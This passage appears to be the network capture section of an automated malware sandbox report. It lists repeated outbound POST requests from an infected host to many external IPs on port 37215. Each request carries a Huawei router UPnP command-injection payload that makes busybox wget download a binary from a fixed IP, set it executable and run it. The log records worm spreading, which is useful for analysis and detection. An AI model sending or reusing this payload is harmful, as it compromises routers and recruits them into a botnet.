                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              565192.168.2.155953045.190.125.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721544027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              566192.168.2.154274894.245.136.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721554041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              567192.168.2.1557848122.150.252.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721581936 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              568192.168.2.1555042138.148.121.18137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721602917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              569192.168.2.1558892138.161.222.6037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721604109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              570192.168.2.154342231.4.244.11337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721620083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              571192.168.2.1548644222.134.237.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721638918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              572192.168.2.1533734102.43.220.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721654892 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              573192.168.2.1533346197.104.248.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721703053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              574192.168.2.155887094.197.128.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721704960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              575192.168.2.1538574122.33.91.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721704006 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
